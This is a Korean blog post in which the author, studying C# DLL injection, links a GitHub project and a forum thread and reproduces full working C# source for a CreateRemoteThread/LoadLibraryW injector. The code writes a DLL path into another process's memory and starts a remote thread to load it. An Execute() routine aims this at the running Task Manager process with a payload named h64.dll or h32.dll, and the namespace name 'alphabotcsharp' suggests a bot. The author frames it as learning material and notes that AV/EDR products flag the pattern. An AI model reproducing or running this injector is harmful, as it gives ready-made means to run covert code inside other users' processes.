C# dll injection 오픈소스 사이트 공유
공부 중에 C# DLL injection이 궁금해서 찾아 보았다.
해당 프로젝트에는 DLL injection 코드와 예제로 사용할 소스까지 나와 있어, 추후 분석을 위해 공유해 둔다.
https://github.com/ChadSki/SharpNeedle
또 다른 사이트의 간단한 예제 코드도 공유합니다. 아래 코드는 대상 프로세스 메모리에 DLL 경로를 써 넣고 CreateRemoteThread로 LoadLibrary를 호출하게 만드는 고전적인 방식으로, 인젝터와 대상 프로세스의 비트 수(32/64)가 같아야 하고 OpenProcess가 성공할 만큼의 권한(관리자 권한 대상이면 인젝터도 관리자 권한)이 필요하다. 또한 AV/EDR이 가장 흔히 탐지하는 패턴이므로 학습 목적에만 사용해야 한다.
출처 : https://rstforums.com/forum/topic/103107-c-dll-injection/
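using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;

namespace alphabotcsharp
{
    /// <summary>
    /// Classic "CreateRemoteThread + LoadLibrary" DLL injector (study sample).
    ///
    /// The DLL path is copied into the target's address space and a remote thread
    /// is started at kernel32!LoadLibraryW with that buffer as its argument, so the
    /// target process loads the DLL itself.
    ///
    /// Constraints that follow from how this works:
    ///  - The LoadLibraryW address is resolved in THIS process and reused in the
    ///    target. In practice that is only valid when both processes have the same
    ///    bitness (kernel32 is shared at one base per bitness), so
    ///    <see cref="inject"/> refuses mismatched targets instead of crashing them.
    ///  - OpenProcess must succeed with thread-creation and VM-write rights, i.e.
    ///    the injector needs at least the target's integrity level (an elevated
    ///    target such as Task Manager typically needs an elevated injector) and
    ///    SeDebugPrivilege for processes of other users.
    ///  - This is a textbook injection pattern that AV/EDR products commonly flag.
    /// </summary>
    public class Injection
    {
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        public static extern IntPtr GetModuleHandle(string lpModuleName);

        [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
        static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        static extern bool CloseHandle(IntPtr hObject);

        // OpenProcess access rights (the minimum this technique needs).
        const int PROCESS_CREATE_THREAD = 0x0002;
        const int PROCESS_QUERY_INFORMATION = 0x0400;
        const int PROCESS_VM_OPERATION = 0x0008;
        const int PROCESS_VM_WRITE = 0x0020;
        const int PROCESS_VM_READ = 0x0010;

        // VirtualAllocEx flags for the remote path buffer. Committed pages are
        // zero-filled, and PAGE_READWRITE is enough: the buffer only holds data.
        const uint MEM_COMMIT = 0x00001000;
        const uint MEM_RESERVE = 0x00002000;
        const uint PAGE_READWRITE = 4;

        /// <summary>Set by <see cref="Execute"/> once an injection has succeeded.</summary>
        public static bool isInjected = false;

        [DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.Winapi)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool IsWow64Process([In] IntPtr hProcess, [Out] out bool wow64Process);

        // Bitness of THIS process; the target must match for inject() to work.
        static bool is64BitProcess = (IntPtr.Size == 8);
        // 64-bit Windows if we are a 64-bit process, or a 32-bit process under WOW64.
        static bool is64BitOperatingSystem = is64BitProcess || InternalCheckIsWow64();

        /// <summary>
        /// Loads <paramref name="dllPath"/> into <paramref name="tProcess"/> by
        /// writing the path into the target and running LoadLibraryW there on a
        /// remote thread.
        /// </summary>
        /// <param name="dllPath">Path of the DLL to load. Pass an absolute path: it is
        /// resolved by the target process, not by this one.</param>
        /// <param name="tProcess">The process to inject into.</param>
        /// <returns>0 on success; the Win32 error code of the failing call, or -1
        /// when no error code is available or the target's bitness differs from
        /// this process.</returns>
        /// <exception cref="ArgumentNullException">tProcess is null.</exception>
        /// <exception cref="ArgumentException">dllPath is null or empty.</exception>
        public static int inject(string dllPath, Process tProcess)
        {
            if (tProcess == null)
            {
                throw new ArgumentNullException("tProcess");
            }
            if (string.IsNullOrEmpty(dllPath))
            {
                throw new ArgumentException("DLL path must not be empty", "dllPath");
            }

            // Handle to the target with the rights the calls below require.
            IntPtr procHandle = OpenProcess(
                PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                false,
                tProcess.Id);
            if (procHandle == IntPtr.Zero)
            {
                return LastError();
            }

            try
            {
                // A LoadLibraryW address from our kernel32 means nothing in a
                // process of the other bitness; refuse rather than crash the target.
                if (!TargetBitnessMatches(procHandle))
                {
                    return -1;
                }

                IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryW");
                if (loadLibraryAddr == IntPtr.Zero)
                {
                    return LastError();
                }

                // UTF-16 path plus terminator; the allocation and the write use the
                // same byte count so nothing past the managed buffer is ever read.
                byte[] pathBytes = EncodeDllPath(dllPath);
                IntPtr remoteBuffer = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)pathBytes.Length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                if (remoteBuffer == IntPtr.Zero)
                {
                    return LastError();
                }

                UIntPtr bytesWritten;
                if (!WriteProcessMemory(procHandle, remoteBuffer, pathBytes, (uint)pathBytes.Length, out bytesWritten)
                    || bytesWritten.ToUInt64() != (ulong)pathBytes.Length)
                {
                    return LastError();
                }

                // Run LoadLibraryW(remoteBuffer) on a new thread inside the target.
                IntPtr threadHandle = CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, remoteBuffer, 0, IntPtr.Zero);
                if (threadHandle == IntPtr.Zero)
                {
                    return LastError();
                }

                // The remote buffer is deliberately left allocated: the remote thread
                // may still be reading it, and freeing it safely would require waiting
                // on threadHandle first.
                CloseHandle(threadHandle);
                return 0;
            }
            finally
            {
                CloseHandle(procHandle);
            }
        }

        /// <summary>
        /// Builds the byte image of <paramref name="dllPath"/> as LoadLibraryW
        /// expects it: UTF-16LE characters followed by a two-byte NUL terminator.
        /// </summary>
        /// <param name="dllPath">Path to encode.</param>
        /// <returns>Encoded path; its Length is the exact number of bytes to allocate and write remotely.</returns>
        public static byte[] EncodeDllPath(string dllPath)
        {
            byte[] chars = Encoding.Unicode.GetBytes(dllPath);
            byte[] buffer = new byte[chars.Length + 2];
            Buffer.BlockCopy(chars, 0, buffer, 0, chars.Length);
            // Trailing two bytes are already zero (array initialisation).
            return buffer;
        }

        /// <summary>
        /// True when the process behind <paramref name="procHandle"/> has the same
        /// bitness as this process. Requires PROCESS_QUERY_INFORMATION on the handle.
        /// </summary>
        private static bool TargetBitnessMatches(IntPtr procHandle)
        {
            if (!is64BitOperatingSystem)
            {
                // 32-bit Windows: every process, including this one, is 32-bit.
                return true;
            }

            bool targetIsWow64;
            if (!IsWow64Process(procHandle, out targetIsWow64))
            {
                return false;
            }
            bool targetIs64Bit = !targetIsWow64;
            return targetIs64Bit == is64BitProcess;
        }

        /// <summary>
        /// Last Win32 error as a non-zero failure code (-1 when the API left no code).
        /// </summary>
        private static int LastError()
        {
            int err = Marshal.GetLastWin32Error();
            return err != 0 ? err : -1;
        }

        /// <summary>
        /// Injects h64.dll or h32.dll (next to the entry assembly) into the first
        /// running "taskmgr" process and records success in <see cref="isInjected"/>.
        /// </summary>
        /// <exception cref="InvalidOperationException">No taskmgr process is running.</exception>
        public static void Execute()
        {
            // The payload must match THIS process's bitness: inject() only accepts
            // same-bitness targets, so choosing by OS bitness (the old behaviour)
            // would pick h64.dll for a 32-bit injector on 64-bit Windows.
            string baseDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().Location);
            string rawDLL = Path.Combine(baseDir, is64BitProcess ? "h64.dll" : "h32.dll");

            Process[] candidates = Process.GetProcessesByName("taskmgr");
            if (candidates.Length == 0)
            {
                throw new InvalidOperationException("No running taskmgr process to inject into");
            }

            try
            {
                // Task Manager typically runs elevated; from a non-elevated injector
                // OpenProcess fails with ERROR_ACCESS_DENIED and this returns non-zero.
                int rc = Injection.inject(rawDLL, candidates[0]);
                if (rc == 0)
                {
                    isInjected = true;
                }
            }
            finally
            {
                foreach (Process p in candidates)
                {
                    p.Dispose();
                }
            }
        }

        /// <summary>Whether <see cref="Execute"/> has already injected successfully.</summary>
        public static Boolean isInjectedAlready()
        {
            return isInjected;
        }

        /// <summary>
        /// True when this process runs under WOW64 (a 32-bit process on 64-bit
        /// Windows). IsWow64Process exists from XP SP1 / Server 2003 onward, hence
        /// the version gate; older systems are reported as not WOW64.
        /// </summary>
        public static bool InternalCheckIsWow64()
        {
            Version os = Environment.OSVersion.Version;
            bool apiAvailable = (os.Major == 5 && os.Minor >= 1) || os.Major >= 6;
            if (!apiAvailable)
            {
                return false;
            }

            using (Process self = Process.GetCurrentProcess())
            {
                bool isWow64;
                if (!IsWow64Process(self.Handle, out isWow64))
                {
                    return false;
                }
                return isWow64;
            }
        }
    }
}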